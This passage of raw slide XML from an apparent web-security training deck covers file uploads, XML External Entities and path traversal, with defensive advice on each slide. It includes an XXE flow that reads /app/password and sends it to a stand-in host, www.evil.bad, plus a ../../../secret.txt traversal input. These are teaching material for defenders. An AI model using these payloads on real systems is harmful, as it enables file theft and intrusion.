                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2DD4FC-000F-EF40-A39A-37EBDD857261}"/>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2011545" y="3525022"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Graphic 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921835DC-FD13-8D43-B42D-06E747C428DF}"/>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16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217520" y="2794475"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C6889B-03F6-BE4B-BDF0-0FAB1792E79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424407" y="1259242"/>
            <a:ext cx="3434638" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>Servers that allow file uploads must prevent executables and scripts from being uploaded by employing a file type whitelist and changing the file name and extension after upload.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417438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C0020F74-88C1-7A49-92E4-1BFFF00ABA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643659" y="2501704"/>
            <a:ext cx="4254567" cy="3154710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="23000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FBA5DEC-E4C6-BB41-A0C5-EE55ACA66A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805540" y="3013881"/>
            <a:ext cx="3994760" cy="2324995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="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542500" y="443255"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML External Entities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4E6602-51D7-D744-84FA-B7F8376BC76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645713" y="4703914"/>
            <a:ext cx="1050542" cy="1322377"/>
            <a:chOff x="3150422" y="3824239"/>
            <a:chExt cx="1050542" cy="1322377"/>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99443" y="3824239"/>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3150422" y="4777284"/>
              <a:ext cx="1050542" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DBFE9D-CC97-7A4D-B83A-33E68820F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354238" y="2352505"/>
            <a:ext cx="1626340" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML Processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087E0E9B-145B-304A-99DD-4F1890294A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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811756" y="1484146"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C6D0F05-8CA4-6D41-A5DF-7EEB71B7FAF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932422" y="3267838"/>
            <a:ext cx="4026183" cy="286232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Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/app/password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;xxe;</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Link to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.evil.bad/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;xxe;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Curved Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2720C6B7-02D6-CC4E-963C-7204DDE57B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2530213" y="1917740"/>
            <a:ext cx="2454140" cy="2825"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="7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77780A6-765F-BC47-8367-DA53B3812228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486372" y="1460401"/>
            <a:ext cx="3297322" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmttN9YC4bK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7322D28A-5BB9-AA43-A6E6-CE1AF4C2FEA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0810" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984353" y="1454602"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F02034-A0C5-5F43-9C21-1A6632715CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589605" y="2412181"/>
            <a:ext cx="1507951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.evil.bad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="51" name="Curved Connector 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577D7AAA-998C-B84E-BA76-876A713DC084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1178158" y="3711088"/>
            <a:ext cx="1982077" cy="3576"/>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449E351-925A-4440-9813-8391BA3566AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986286" y="5666387"/>
            <a:ext cx="1633268" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML Document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79D1E90-232F-1049-AAD5-3BEDD75A3290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190916" y="1336842"/>
            <a:ext cx="4322900" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Applications that process XML documents must disable processing of external entities. XML External Entities can be used to leak content of files from the host server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2041515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FE33E449-6A50-C940-ADC5-25A3B97CA7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567765" y="2197851"/>
            <a:ext cx="349049" cy="450014"/>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382395" y="1672003"/>
            <a:ext cx="875012" cy="1063032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1228580" y="790035"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173095" y="1807489"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3026049" y="4256853"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64" name="Group 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74CA301-D0DB-954F-8811-F42C5E388242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228580" y="4514012"/>
            <a:ext cx="1050542" cy="1270957"/>
            <a:chOff x="1228580" y="4514012"/>
            <a:chExt cx="1050542" cy="1270957"/>
          </a:xfrm>
        </p:grpSpPr>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7601" y="4514012"/>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228580" y="5415637"/>
              <a:ext cx="1050542" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Curved Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C361591-A5FB-B349-BCAF-FF8BE597FD85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1997137" y="2684971"/>
            <a:ext cx="1585755" cy="2072326"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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621EC77-1618-5043-AEE2-5DBDF80E9CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081458" y="3427124"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../secret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623D2E1C-5E9C-E341-8301-F960DFDDA3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5589" y="2315364"/>
            <a:ext cx="456525" cy="456525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A6AA06-C655-4F43-9E99-C420AE5652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9652" y="2015208"/>
            <a:ext cx="913049" cy="913049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Graphic 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458E9429-3307-B84C-A2B5-BA0BBB18BDD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58921" y="2167171"/>
            <a:ext cx="710294" cy="710294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Graphic 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE43077-F31A-BC47-BC8E-C07B195917B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050602" y="2269583"/>
            <a:ext cx="584732" cy="584732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Curved Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC8D0D6-51D9-8245-9D49-9311AC3872D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3075994" y="3678439"/>
            <a:ext cx="1511926" cy="11561"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="62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1B38DB61-E807-4441-BEA6-FA5D51C04340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="0"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3039579" y="2141660"/>
            <a:ext cx="761086" cy="812109"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30036"/>
              <a:gd name="adj2" fmla="val 43758"/>
              <a:gd name="adj3" fmla="val 13003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D64F8AEE-94E6-A644-AAFD-06A2904597B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="50" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2374577" y="2237974"/>
            <a:ext cx="607882" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37606"/>
              <a:gd name="adj2" fmla="val 45322"/>
              <a:gd name="adj3" fmla="val 13760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7EB8F141-975A-9445-92BC-6841FA4F3382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1778934" y="2290281"/>
            <a:ext cx="538951" cy="589116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42416"/>
              <a:gd name="adj2" fmla="val 44559"/>
              <a:gd name="adj3" fmla="val 142416"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="62000"/>
              </a:srgb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23E0F19-51A2-CC47-B438-25CD6E1F428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577057" y="2071942"/>
            <a:ext cx="1062663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="TextBox 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1E328E-278A-7442-8F3C-EA6F3A1E6EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918399" y="4128926"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
